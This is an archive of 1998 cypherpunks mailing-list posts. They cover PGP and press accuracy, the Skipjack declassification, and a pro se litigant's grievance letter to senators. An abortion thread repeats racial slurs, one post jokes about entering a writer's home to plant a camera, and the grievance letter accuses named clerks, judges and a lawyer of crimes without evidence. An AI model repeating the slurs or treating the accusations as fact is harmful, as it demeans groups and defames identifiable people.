What you mean to say, I think, is that PGP uses public-key cryptography for key exchange.  The sender uses the reciver's public key to encrypt a session key, and that session key is used to encrypt the email message.

"For more on encryption and encryption products, a buyer's first stop should be the International Computer Security Association.  This ICSA is an independent organization that tests and certifies security products."

ICSA is a private for-profit company, despite what the name implies.  And while they do do some testing and certifying of security products, they do not test or certify encryption products.

Honestly, I can't believe this article made it into print.  Don't you have editors?

Bruce Schneier
President, Counterpane Systems
Author, Applied Cryptography
http://www.counterpane.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Date: Wed, 24 Jun 1998 10:50:36 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Subject: CTIA Daily News from WOW-COM - June 24, 1998
Message-ID: <199806241728.MAA10305@revnet4.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



=====================================

Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon for the
most important news in wireless communications today.

CALEA Summit being held July 21 & 22 in Washington, DC.
Register Now!!  Call (202) 785-0081

=====================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Wed, 24 Jun 1998 05:50:19 -0700 (PDT)
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: abortion [was: Banning privacy: A radical proposal]
In-Reply-To: <199806240806.DAA022.63@geiger.com>
Message-ID: <Pine.BSF.3.96.980624123712.269H-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Jun 1998, William H. Geiger III wrote:

> And if they really want to save some children why don't they shut down the
> multi-billion dollar infanticide industry known as abortion. Why are these
> medical hacks allowed to do to children what they would be jailed for
> doing to a dog? Perhaps because it serves nicely with the elitist goals of
> population control (need to keep the number of niggers, bean pickers, and
> white trash down to a controllable number) not to mention that their
> pockets are well lined by the hacks.
> 
    no, abortion does not serve the interests of limiting the
    "undesirables" to meet elitist population control ideas.  quite
    the opposite --the various machinations of the extremeist
    conservative [bowel] movement and depriving of abortion funds 
    has meant that abortion is available only to the haves. same
    result in U.S. foreign policy which excludes not only abortion
    services from foreign aid disbursement, but also birth control.

    so, the population of "bean pickers, niggers, and white trash"
    increases relative to the desired "white" population --rather
    dramatically --"elitist" families have negative population
    growth; several of the others have factors as high as 300%.

    personally, I am against abortion-- however, I'll be damned if
    I would deny anyone else either the right or the means to make
    that personal decision. it is not a question of morality; it is
    a fundamental right to freedom of choice unencumbered by an
    increasingly invasive federal government --the first Bitch can
    take her Global Village into her house, not mine.

	attila out...

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Wed, 24 Jun 1998 10:53:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Banning privacy: A radical proposal
In-Reply-To: <19980624011241.15925.qmail@hades.rpini.com>
Message-ID: <Pine.SUN.3.91.980624124555.14893B-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On 24 Jun 1998, Anonymous wrote:

> This came from Yahoo/ZDNet. Mr. Pappas suggests that we just ban anonymity
> and privacy to "protect the children." Now where have I heard that before?
> And yet again, the "Ethical Hackers Against Pedophilia" raise their heads,
> no pun intended.

	Thanks for the info.  Maybe some merry band of pranksters
	would be willing to sneak into this guy's house and install
	an obvious-looking mock camera over his shower head?  I mean,
	just in case he's a child molester and all.

	Maybe once we're done legislating the internet, we can
	legislate the topolology of Euclidean space, so that every
	point is within earshot of a mike and eyeshot of a camera.
	After all, those evil child molesting evil bad evil people
	might take to doing evil stuff in their basement, or the
	nearby woods!

==-  Xcott Craver -- Caj@niu.edu -- http://www.math.niu.edu/~caj/  -==
"Also note that elecronagnetic theory proves that if you microwave a
 bar of Ivory soap it turns into a REAL MARSHMALLOW THAT YOU CAN EAT."
                                                   -James "Kibo" Parry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Wed, 24 Jun 1998 09:11:11 -0700 (PDT)
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: Banning privacy: A radical proposal
In-Reply-To: <199806241458.KAA01546@cti06.citenet.net>
Message-ID: <Pine.BSF.3.96.980624160038.424A-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Jun 1998, Jean-Francois Avon wrote:

> On Wed, 24 Jun 1998 00:38:06 -0500, William H. Geiger III wrote:
> 
> >And if they really want to save some children why don't they shut down the
> >multi-billion dollar infanticide industry known as abortion. Why are these
> >medical hacks allowed to do to children what they would be jailed for
> >doing to a dog? Perhaps because it serves nicely with the elitist goals of
> >population control (need to keep the number of niggers, bean pickers, and
> >white trash down to a controllable number) not to mention that their
> >pockets are well lined by the hacks.
> 
> Hey William, that's called "woman freedom to choose".  Woman right precedes the 
> baby-that-might-be rights for she is the sine-qua-none condition for the baby-who-might-be 
> to exist.
>
    as I said, I am personally against abortion, but your point is
    absolutely correct: it is "the freedom to chose" on the part of
    the woman who must carry the _potential_ child to term  --and,
    yes, the woman is the 'sine qua non' condition.

    what the absolutists in the Right to Life movements do not
    understand, and refuse to accept, is that they have _no_ God
    given right to tell another what they can or can not do that
    does not _directly_ infringe on their own rights; as a
    consequence, the fanatics believe they have the God given
    right to legislate morality --and then there are back alley
    coat hanger abortions where the nascent mother is placed
    at an unacceptable risk.

    and, there is nothing sadder than an unwanted, often fatherless, 
    child.

	attila out...

and you better believe the following are indisputable truths....

> Definition:  FACISM: n.:  a political and economic movement, strongly nationalistic, 
> magnifying the rights of the state as opposed to those of the individual, in which 
> industry, though remaining largely under private ownership, and all administrative
> political units, are controlled by a strong central government.
>         -------------------------------------------------
> "One of the ordinary modes by which tyrants accomplish their purpose, without resistance, 
> is by disarming the people and making it an offense to keep arms".  - Joseph Story, U.S. 
> Supreme Court Justice.
>         -------------------------------------------------
> "1935 will go down in history! For the first time a civilized nation has full gun 
> registration! Our streets will be safer, our police more efficient, and the world will 
> follow our lead in the future!"  
> 					-Adolf Hitler, April 1935
>         -------------------------------------------------
__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Wed, 24 Jun 1998 16:49:02 -0700 (PDT)
To: attila <attila@hun.org>
Subject: Re: Banning privacy: A radical proposal
In-Reply-To: <Pine.BSF.3.96.980624160038.424A-100000@hun.org>
Message-ID: <199806242352.SAA029.59@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <Pine.BSF.3.96.980624160038.424A-100000@hun.org>, on 06/24/98 
   at 11:10 AM, attila <attila@hun.org> said:

>> Hey William, that's called "woman freedom to choose".  Woman right precedes the 
>> baby-that-might-be rights for she is the sine-qua-none condition for the baby-who-might-be 
>> to exist.
>>
>    as I said, I am personally against abortion, but your point is
>    absolutely correct: it is "the freedom to chose" on the part of
>    the woman who must carry the _potential_ child to term  --and,
>    yes, the woman is the 'sine qua non' condition.

The woman made her choice when her legs went up in the air. Because she
does not wish to be inconvenienced by the consequences of her actions does
not give here the right to commit murder.


>    what the absolutists in the Right to Life movements do not
>    understand, and refuse to accept, is that they have _no_ God
>    given right to tell another what they can or can not do that
>    does not _directly_ infringe on their own rights; as a
>    consequence, the fanatics believe they have the God given
>    right to legislate morality --and then there are back alley
>    coat hanger abortions where the nascent mother is placed
>    at an unacceptable risk.

Bunk, their are numerous laws that tell others what they can or can not
do. It is illegal to steal, it is illegal to commit murder. The fact they
you may be stealing from someone else or trying to kill someone else does
not make it any less illegal (and immoral). Every human has basics rights;
the right to life being the cornerstone of those rights.

I think it quite acceptable for someone to incur risks while in the act of
commiting murder up to and including their own death. As far as the
practitioners of murderer for profit they are no better than the Nazi's
gassing the Jews.

>    and, there is nothing sadder than an unwanted, often fatherless, 
>    child.

Yes their is, a dead one. I suggest you talk to some "unwanted",
fatherless children and ask them if they would rather be dead (not to
mention die a quite painful and barbaric death). I think you will find
that few of them share your opinions on the matter.

<sigh> I really didn't want this to turn into an abortion debate. I was
just trying to show the hypocrisy of the "save the children" crowd.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: This marks Logical End-Of-Message. Physical EOM follows

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNZGRVo9Co1n+aLhhAQG3UAQAqmOrIaDiIDsvAN0Sb0pWxqR58x4ta8xg
AU0GYnnETZHJOucWVsJf9qVvcVVQXa8M7Bh5e/mHAc1wL6BRmlCXmCMtXqEhXCHB
z1Tm/JwJWx+v16ToNWaWt1Zmv56MwECQflJQPCcwVpBgghLPgn+vARCagjq+eTqq
5hIP8HZ6+nY=
=KEEt
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Wed, 24 Jun 1998 20:19:00 -0700 (PDT)
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: Banning privacy: A radical proposal
In-Reply-To: <199806242352.SAA029.59@geiger.com>
Message-ID: <Pine.BSF.3.96.980625025713.282B-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 24 Jun 1998, William H. Geiger III wrote:

> <sigh> I really didn't want this to turn into an abortion debate. I was
> just trying to show the hypocrisy of the "save the children" crowd.
> 
    what I said was that I am _personally_ against abortion;  and,
    yes, I _personally_ consider it a offense against our God; but,
    I do not go so far as to say it is murder in the social context; 
    I do believe that is not my privilege to tell another they can
    not commit the sin of "choosing when their legs went in the 
    air"; and, abortion statistics show that the vast majority of
    abortions are for "mistakes" or failure of birth control. keep
    in mind, the extreme right has also been campaigning to
    eliminate the availability of birth control --which then raises
    the abortion rate... and, if you want to shade the argument,
    should all abortion be illegal?  date rape? rape? deformity?
    downs syndrome, bifidia? health of the mother?

    yes, let's drop the subject as there is no solution.  

    few can debate the issue calmly, or even intelligently. I just
    look at abortion as a fact of society that has been with us for
    milleniums; you cant stop it any more than Prohibition was
    successful, or the War on Drugs has been successful.  why does
    the government continue the war on drugs? simple, it's
    profitable for them in many ways (as the largest vendor, if
    nothing else). 

    besides, if we want to have a pissing contest, I am as far right
    as it goes --with one exception: I dont want to change anyone!
    we call it "free-agency" --them that wish to go to Hell, line 
    up on the left! --or dont, if you do not wish to-- the choice
    is yours.

    'nuff said!

	attila out...

___________________________________________________________________
three things I dont tolerate:  crackers, fed stoolies, and toadies.

	





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 25 Jun 1998 04:57:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA Declass Query
Message-ID: <199806251157.HAA13191@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Spyrus claims in a press release yesterday that NSA
announced declassification of SKIPJACK and KEA on
June 6, earlier than the DoD notice on June 23. 

Does anyone know where and how NSA made this
earlier announcement, and whether there is a document
on it? We've queried Spyrus but no answer yet.

Spyrus has scheduled a June 30 conference on its release
of a FORTEZZA library and products in connection with
the NSA declassification. Bruce Schneier is a keynote
speaker.


http://www.spyrus.com/company/releases/pr_swf.html








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Thu, 25 Jun 1998 07:11:25 -0700 (PDT)
To: colin@nyx.net
Subject: Skipjack SIMULATIONS
Message-ID: <3592598D.1EAE@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

willis@rand.org            http://www.jya.com/skipjack-fi.htm 
Markus.Kuhn@cl.cam.ac.uk   http://www.jya.com/skipjack-uk.htm
perry@piermont.com         http://jya.com/skipjack-pem.txt
mab@research.att.com       http://www.jya.com/skipjack-mab.htm
colin@nyx.net              http://www.jya.com/skipjack-cp.txt

Guys

I looked at your neat, what I would call, SIMULATIONS of the skipjack
algorithm.

I get an uncomfortable feeling in terms of work involved in implementing

/* The permutation G */
#define G(l, r, key, koff) \
        ((l) ^= F[(r) ^ (key)[(koff)%10]],      \
        (r) ^= F[(l) ^ (key)[((koff)+1)%10]],   \
        (l) ^= F[(r) ^ (key)[((koff)+2)%10]],   \
        (r) ^= F[(l) ^ (key)[((koff)+3)%10]])

on, say, an 8051.

NSA gave Sandia similar algorithm SPECIFICATIONS.

I simulated Benincasa's NSS/USO algorithm in Forth to make sure
I THOUGH that I understood it.   And could produce the test vectors.
http://jya.com/da/whpda.htm

In the REAL WORLD at Sandia some of the following considerations
IMMEDIATELY DOMINATE THE ALGORITHM.

1    power budget
2    thermal constraints
3    size limitations
4    conducted and radiated emissions
5    radiation-hard requirements
6    speed requirements
7    memory requirements
8    red/black analysis
9    hardware fault tolerance [DELFAS]
10   implementation work GUESS
11   software technology limitations [Can we use Forth?]
12   ...

I am guessing that putting Skipjack on, say, on a smart card might
involve some hairy engineering.  

NSA KG units Brian Snow showed me were fairly small in size.  Say
about 1-2 inches x  1-2 inches x 5-6 inches.

Shift register crypto technology is much simpler than number-based
crypto technology.  Size, power, scalability, ... are the reasons, I
think, 
that NSA uses shift registers for its GOOD STUFF.

Also, NSA/Sandia had SOME REAL project DISASTERS with number-based
crypto.  Expensive, embarrassing, ...  What ever happened to Sandia's
low- and high-speed public key crypto chips?

I am very pleased to see all of this information getting out so everyone
can look at it.

I may have a project coming up - protecting gas pipeline survey data
from competitors.  I DO NOT plan to TRY TO reinvent a crypto algorithm. 

I will implement someone else's idea.  Good idea from a liability
standpoint too!

Morales and I need to complete our SETTLEMENT PROJECT so that we
can all move on to other CONSTRUCTIVE projects.

Best
bill

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html


Subject: 
        Judicial Misconduct at Tenth Circuit Court of Appeals
  Date: 
        Mon, 22 Jun 1998 13:29:01 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        art morales <armoral@sandia.gov>, senator_hatch@Hatch.senate.gov, senator@thurmond.senate.gov,
        chuck_grassley@grassley.senate.gov, senator_specter@specter.senate.gov, 
senator_thompson@thompson.senate.gov,
        info@kyl.senate.gov, senator_dewine@dewine.senate.gov, john_ashcroft@ashcroft.senate.gov, 
michigan@abraham.senate.gov,
        senator_leahy@leahy.senate.gov, senator@kennedy.senate.gov, senator@biden.senate.gov, 
senator_kohl@kohl.senate.gov,
        senator@feinstein.senate.gov, russell_feingold@feingold.senate.gov, dick@durbin.senate.gov, 
senator@torricelli.senate.gov
    CC: 
        steve dillingham <" Steven.Dillingham"@hq.doe.gov>, Robert Nordhaus <" 
Robert.Nordhaus"@hq.doe.gov>, mrgall@ix.netcom.com,
        jy@jya.com, art morales <armoral@sandia.gov>, federico pena <" Federico.F.Pena"@hq.doe.gov>, 
RJPARK@sandia.gov,
        cypherpunks@toad.com, ukcrypto@maillist.ox.ac.uk


Monday 6/22/98 1:02 PM

Senate Judiciary Committee
http://www.senate.gov/committee/judiciary.html

Republicans

Orrin G. Hatch, Utah, Chairman   senator_hatch@Hatch.senate.gov
Strom Thurmond, South Carolina   senator@thurmond.senate.gov
Charles E. Grassley, Iowa   chuck_grassley@grassley.senate.gov
Arlen Specter, Pennsylvania   senator_specter@specter.senate.gov
Fred Thompson, Tennessee   senator_thompson@thompson.senate.gov
Jon Kyl, Arizona   info@kyl.senate.gov
Mike DeWine, Ohio   senator_dewine@dewine.senate.gov
John Ashcroft, Missouri   john_ashcroft@ashcroft.senate.gov
Spencer Abraham, Michigan   michigan@abraham.senate.gov
Jeff Sessions, Alabama

Democrats

Patrick J. Leahy, Vermont   senator_leahy@leahy.senate.gov
Edward M. Kennedy, Massachusetts   senator@kennedy.senate.gov
Joseph R.Biden, Jr., Delaware   senator@biden.senate.gov
Herb Kohl, Wisconsin   senator_kohl@kohl.senate.gov
Dianne Feinstein, California   senator@feinstein.senate.gov
Russell D. Feingold, Wisconsin   russell_feingold@feingold.senate.gov
Richard Durbin, Illinois   dick@durbin.senate.gov
Robert Torricelli, New Jersey   senator@torricelli.senate.gov

Purpose of this e-mail is to give written proof of criminal judicial
misconduct by Tenth Circuit Court of Appeals clerks Hoecker, Fisher, and
Judges Moore, Barrett, Weis and help get this matter settled.

Thursday March 30, 1995 I wrote Tenth Circuit clerk Hoecker to request a
copy of the docket sheets for case 94-2205  Payne v. Sandia Corporation,
et al

Hoecker did not answer my letter.

On Tuesday March 5,1996 I  wrote  Judge Lucius D. Bunton to ask his help
to get a copy of the docket sheets.  No response.

On Monday September 23, 1996 Arthur R Morales and I wrote  Henry A.
Politz, Chief Judge U.S. Court of Appeals - Fifth Circuit to ask his
help to get a copy of the docket sheets of my case and Morales' Tenth
Circuit case 95-2204.

Tenth Circuit also refused to send Morales copies of docket sheets for
his case.

Politz is Bunton's boss.  No response.

Friday May 30, 1997 I wrote Antonin Scalia to get this help to get a
copy of the docket sheets.  No response.

5 May 1998 citizen John Young finds docket sheets on

    Source: PACER, U.S. Court of Appeals, 10th Circuit, 1-800-279-9107

and posts them on Internet at http://jya.com/whp-10usca.htm

  Docket as of April 10, 1998 0:05 am
  Proceedings include all events.
  94-2205  Payne v. Sandia Corporation, et al

shows that I filed my Brief of the Appellant on 2/19/95.

2/23/95     [835344] Appellant's brief filed by William H. Payne.
            Original and 7 copies.   c/s: y. Served on 2/19/95  Oral
            argument? pro se. Appellee/Respondent's brief due 3/24/95
            for Thomas P. Wright, for Robert Surran, for Paul A.
            Stokes, for Mary J. Stang, for Tommy A. Sellers, for Craig
            A. Searls, for Albert Narath, for Preston B. Herrington,
            for Peter S. Hamilton, for Roger L. Hagengruber, for James
            R. Gosler, for Harold L. Folley, for Robert L. Ewing, for
            C. William Childers, for Harvey J. Brewster, for Sandia
            Corporation (mbm)

mbm writes "Appellee/Respondent's brief due 3/24/95"

Sandia had sent me a copy of its brief by 3/28/96.

I filed  attached MOTION TO GRANT PLAINTIFF-APPELLANT'S DEMANDS ON BASIS
THAT DEFENDANT-APPELLEES FAILED TO FILE BRIEF WITHIN 30 DAYS SPECIFIED
BY FEDERAL RULE OF APPELLATE PROCEDURE 31 on Tuesday the 28th day of
March, 1995

My February 28 MOTION at the Tenth Circuit is filed WITHOUT notice of
service logged.

4/4/95       [845484] Appellant's motion filed by Appellant William H.
             Payne [94-2205] to grant appellant's demands on basis that
             appellees' failed to file timely brief. Original and 3
             copies  c/s: y (mbm)

In 1995 FRAP 25 (a) stated  "[b]riefs shall be deemed filed on the day
of mailing if the 
most expeditious form of delivery by mail, excepting special delivery,
is used."

FRAP 25 has been changed by 1998 to
http://www.ca5.uscourts.gov/docs/frap-iop.htm#25a

Since I mailed Appellant's motion filed by Appellant William H.  Payne
[94-2205] to grant appellant's demands on basis that appellees' failed
to file timely brief on 3/28/98, it is likely Sandia's lawyer Friedman
received it 3/29/95.

Tenth Circuit logs

3/30/95      [844759] Appellee's brief filed by Sandia Corporation,
             Harvey J. Brewster, C. William Childers, Robert L. Ewing,
             Harold L. Folley, James R. Gosler, Roger L. Hagengruber,
             Peter S. Hamilton, Preston B. Herrington, Albert Narath,
             Craig A. Searls, Tommy A. Sellers, Mary J. Stang, Paul A.
             Stokes, Robert Surran, Thomas P. Wright. Original and 7
             copies. c/s: y. Served on 3/27/95  Oral Argument? y
             (appellant is pro se) Appellant's optional reply brief due
             4/13/95 for William H. Payne (mbm)

Federal Rule of Appellate Procedure [FRAP] 26 (c) states

  (c) Additional Time after Service. When a party is required or
permitted to act within a      prescribed period after service of a
paper upon that party, 3 calendar days are added to the     prescribed
period unless the paper is delivered on the date of service stated in
the proof of   service. 

  http://www.ca5.uscourts.gov/docs/frap-iop.htm#26c

While the Tenth Circuit ASSERTS Appellees' brief was, in fact, served on
3/27/95
evidence given below points to the brief  was served, in fact, on
3/29/95.  

I allege that Friedman affixed a false date of service to Sandia's
brief.

I WAS NEVER PROPERLY SERVED.  I wrote

          Wednesday March 29, 1995

          Dan Friedman
          Simons, Cuddy & Friedman
          Pecos Trail Office Compound
          1701 Old Pecos Trail
          POB 4160
          Santa Fe, NM 87502-4160
          505-988-4476
          505-984-1807 FAX

          Dear Lawyer Friedman:

          Today at 14:00 hours I found a green and white about 9x13
          inch envelope in our mail box at my home.

          Mailing label indicated that the envelope came from your
          firm.  CONFIDENTIAL was stamped on the mailing label.

          I  wrote "Received at 14:00 hours on W 3/29/95 with no
          POSTMARK OR STAMP by W. H. Payne" at the bottom of the
          envelope.

          There was no STAMP OR POSTAGE METER LABEL or 
          POSTMARK on the envelope.

          Therefore, I gave the envelope to US Postal Service
          supervisor Mel at 14:49 hours today at the Postal Receiving
          station at 9904 Montgomery, NW in Albuquerque.  Mel has a
          copy of the cover of the envelope with Mel's note written on
          it.

          Mel told me the post office was going to return the envelope
          to your firm for proper mailing.

          I ask:

         1    What did this envelope contain?  Please identify
              the documents precisely.

         2    If any Certificates of Service were included in the
              envelope, then what were the dates affixed to these
              documents?

         3    Who placed this envelope in our mail box?

         Lawyer Friedman:  It appears you missed an important filing
         date.  And are in the process of attempt to correct your
         failure.  But may be using illegitimate methods to conceal
         your failure.

         Please respond as soon as possible so that we all may
         discover what has happened here." ...

Lawyer Friedman did not respond to the above letter.

But Friedman did mail me Appellees' brief many days later in envelope
showing TRUE MAILING date.  Certificate of service on received
Appellees' brief
did not reflect postmark date.

10th Cir. R. 25.4 in 1995 page 62 reads
  
  Papers not accepted for filing. -- The clerk shall not file papers
that do not comply
  with the Federal Rules of Appellate Procedure and these rules See
10thCir. R. 42.1

But Tenth Circuit clerks Fisher and Hoecker despite my protests and
submission of
evidence may have stamped FILED on Sandia's IMPROPERLY SERVED 
Appellee/Respondent's brief according to the Federal Rules of Appellate
Procedure.

Laywer Friedman FALSIFIED THE CERTIFICATE OF SERVICE.   

Friedman DID NOT MAIL ME "Served on 3/27/95."

d) Proof of Service; Filing. A paper presented for filing shall contain
an acknowledgment of service by the   person served or proof of service
in the form of a statement of the date and manner of service, of the
name of the person served, and of the addresses to which the papers were
mailed or at which they were delivered, certified by the person who made
service. Proof of service may appear on or be affixed to the papers
filed. When a brief or appendix is filed by mailing or dispatch in
accordance with Rule 25(a)(2)(B), the proof of service shall also state
the date and manner by which the document was mailed or dispatched to
the clerk.

  http://www.ca5.uscourts.gov/docs/frap-iop.htm#25a
  
Crime apparently committed by Hoecker and Fisher is

 1017. Government seals wrongfully used and instruments wrongfully
sealed 

Whoever fraudulently or wrongfully affixes or impresses the seal of any
department or agency of the United States, to or upon any certificate,
instrument, commission, document, or paper or with knowledge of its
fraudulent character, with wrongful or fraudulent intent, uses, buys,
procures, sells, or transfers to another any such certificate,
instrument, commission, document, or paper, to which or upon which said
seal has been so fraudulently affixed or impressed, shall be fined under
this title or imprisoned not more than five years, or both. 
http://www.law.cornell.edu/uscode/18/1017.shtml

Despite my protests of judicial misconduct Judges Moore, Barrett, Weis
award decision to Sandia

10/6/95      [890055] Order filed by Judges Moore, Barrett, Weis
             "...All outstanding motions are denied..." (found in Order
             & Judgment of 10/6/95) [879579-1]  Parties served by mail.
             (pdw)

when these judges should not have had Appellees' brief before them.

Then in an apparently attempt to conceal what happened

10/6/95     [890076]  NOTE: THIS ENTIRE CASE IS SEALED. Terminated on
            the Merits after Submission Without Oral Hearing; Judgment
            Affirmed; Written, Signed, Unpublished. Moore, authoring
            judge; Barrett; Weis. [94-2205] (pdw)

I WON MY APPEAL, pro se, ON A TECHNICALITY but judges Judges Moore,
Barrett, Weis
awarded the win to Sandia Labs!

Members of Congress, judicial misconduct in this matter has been
well-documented.  Court records
filed with the Tenth Circuit.  But CURRENTLY under seal.

Lawyers involved in this matter attempt to use the legal strategy of
IGNORE and STONEWALL to
attempt to deny me justice.  

Ignoring and stonewalling by lawyers forced Morales and me to seek
visibility so lawyers
could no longer ignore and stonewall.

Lawyer attitude apparently is that they ignore rules of civil procedure
or even the law so long
as their actions are invisible to public scrutiny.

Visibility was achieved by suing the National Security Agency which
revealed even more judicial misconduct http://www.jya.com/whp052898.htm.

I would like to settle all  matters involved with this unfortunate
cyrpto-related matter,
which includes criminal violations of the Privacy Act.

DOE lawyer Steve Dillingham asked me to prepare a settlement offer in
1994.  I wrote a
settlement letter  May 22, 1994 to Dillingham.  Nothing happened.

June 11, 1998 I made several modifications to my 1994 settlement letter
and sent it e-mail
to Robert Nordhaus, Chief Counsel, DOE.

I ask that you

1  help with settlement of my six-year-old since I won my appeal at the
Tenth Circuit,
2  investigate Tenth Circuit case 94-2205  Payne v. Sandia Corporation,
et al to bring
   the guilty to justice.

Sincerely

william payne

505 292 7037  I am not reading e-mail

http://jya.com/whpfiles.htm
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2
http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html

Coauthor Lewis in the above is one of my former MS and PhD students in
computer science.

http://www.friction-free-economy.com/



Monday 6/22/98 1:04 PM

Members of Congress

Purpose of this e-mail is to give written proof of criminal judicial
misconduct by Tenth Circuit Court of Appeals clerks Hoecker, Fisher, and
Judges Anderson, Barrett, Logan and request a congressional
investigation.

After several years, with Payne, of trying to get Tenth Circuit to send
docket sheets from my case,
citizen John Young  http://www.jya.com/index.htm  locates docket sheets
and posts them
    
  Morales Case Dockets 10th USCA                    June 12, 1998

on Internet at http://www.jya.com/arm061298.htm.

  Source: Online records Tenth Circuit Court of Appeals via PACER 

  GENERAL DOCKET FOR
  Tenth Circuit Court of Appeals

  Court of Appeals Docket #: 95-2204                           Filed:
9/29/95
  Nsuit: 3440
  Morales v. Sandia National Lab.
  Appeal from: United States District Court for the District of New
Mexico

I filed

11/9/95     [898274] Appellant's brief filed by Arthur R. Morales.
            Original and 2 copies.   c/s: y. Served on 11/7/95.  Oral
            argument? pro se. Appellee's brief due 12/11/95 for Sandia
            National Lab. (pdw)

Sandia files its FIRST ATTEMPT at

12/11/95   [905033] Appellee's deficient brief filed by Sandia
           National Lab.. Appellee's corrected brief due 12/21/95 for
           Sandia National Lab.  additional copies received 12/11/95.
           (fg)

Tenth Circuit court clerk Patrick Fisher writes Wells on December 11,
1995
concerning Sandia's deficient brief

  [C]orrections, however made, must be accompanied by proof of service
  upon all other parties to the appeal. ...

and issues

12/14/95   [905975] FIRST notice of rules violation for Deborah D.
           Wells for Appellee Sandia National Lab. (sls)

Wells submits

12/21/95    [907974] Appellee's brief filed by Sandia National Lab..
            Original and 7 copies.   c/s: y. Served on 12/20/95  Oral
            Argument? n Appellant's optional reply brief due 1/8/96 for
            Arthur R. Morales (mbm)

but DOES NOT serve me with a copy.

Wells later admits in

2/1/96        [917660] Response filed by Sandia National Lab.
              Appellant/Petitioner motion to clarify   Original and 3
              copies.  c/s: y response Null Relief Code (fg)

Certificate of Service date 30th day of January, 1996,

  [h]ad Appellant simply made a phone call to the Tenth Circuit, he
could
  have established that the Defendant-Appellee's corrected brief was
indeed
  filed on a timely basis, ...

I protested by filing

1/3/96       [909965] Appellant's motion "for the Court to Grant
             Appeal" filed by Appellant Arthur R. Morales [95-2204].
             Original and 3 copies.  c/s: y. (pdw)

1/3/96       [909966] Appellant's motion "for New Trial" filed by
             Appellant Arthur R. Morales [95-2204]. Original and 3
             copies.  c/s: y. (pdw)

1/3/96       [909967] Appellant's motion "to Discipline
             Defendant-Appellee" filed by Appellant Arthur R. Morales
             [95-2204]. Original and 3 copies.  c/s: y. (pdw)

because Sandia did not properly serve me in violation of Fisher's
December
11, 1995 order.

The Tenth Circuit court of appeals should NOT, by its own rules, filed
Appellee's brief filed by Sandia National Lab..  Original and 7
copies.   
c/s: y. Served on 12/20/95

10th Cir. R. 25.4 in 1995 page 62 reads
  
  Papers not accepted for filing. -- The clerk shall not file papers
that do not comply
  with the Federal Rules of Appellate Procedure and these rules See
10thCir. R. 42.1

And is doubtful whether court clerk Fisher had any authority under
appellate procedure
to permit Wells to correct her deficient brief.  

Rather Sandia's  brief did not comply with with Federal Rules of
Appellate Procedure and should have been summarily rejected for filing.

I WON, pro se, my appeal to the Tenth circuit on a technicality but
Judges Anderson, Barrett, Logan
awarded the win to Sandia Labs.

4/2/96        [932848] Order filed by Judges Anderson, Barrett, Logan
              denying parties' motions for general relief(found in Order
              and Judgment of 4/2/96)--"...During the course of this
              appeal, the parties have filed various motions for
              dismissal, summary grant, and sanctions. We find no merit
              to any of these motions, and they are [920851-1] Parties
              served by mail. (pdw)

by accepting and judging on a documents which was not permitted to be
before the court by
its own rules.

Judicial misconduct in my case has been well-documented as it is in
Payne's case.

Payne and I speculate that similar judicial misconduct may have occurred
at the Tenth Circuit.

Sandia lawyer Robert J Park wrote me a settlement letter on Feb 18,
1998.

I filled in the blanks and made minor handwritten chages and returned it
on February 22, 1998.  

But my offer has not yet been accepted.

I ask that you

1  help have my settlement offer accepted,
2  investigate judicial misconduct in case 95-2204 and punish the
guilty.

Some citizens can only express such frustrations with the US court
system with violence.

I seek change by legal reform.

Sincerely
